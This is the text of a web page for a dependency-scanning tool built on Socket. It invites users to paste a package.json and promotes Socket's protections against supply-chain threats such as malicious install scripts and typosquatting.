Security Intelligence

Scan Your Dependencies.
Know Your Risk.

Paste or upload a package.json to instantly surface supply chain threats — malware, typosquatting, install script hijacking, and more.

No key? Just hit scan — we'll use a demo key so you can try it instantly. Have one? It stays in your browser and is sent only to Socket. Get a free API key →

Analyzing dependencies…

Preparing scan

Executive Summary

Risk Assessment Complete

Analyzing…

Dependency Audit

Package Risk Breakdown

SE Narrative

What Socket Would Have Done

If Socket had been installed on this repository from day one, here's how it would have protected your team — automatically, before any code shipped.

GitHub PR Firewall

Socket's GitHub App would have blocked any pull request introducing a flagged package — displaying an inline warning with a one-click override workflow, long before the dependency reached production.

Real-Time Install Script Detection

Socket scans preinstall / postinstall hooks for network calls, filesystem writes, and obfuscated code — the attack vector used in the majority of supply chain compromises — and alerts before npm install completes.

Typosquatting & Dependency Confusion

Socket's deep package intelligence would have flagged any lookalike package names — such as character-swap variants of popular libraries — before a developer ever ran npm install, preventing credential theft or backdoor injection.

Continuous Monitoring, Zero Config

Once installed, Socket monitors your full dependency graph continuously — not just at install time. New malware signatures, newly-flagged maintainer accounts, and license drift all trigger automatic alerts without any additional developer action.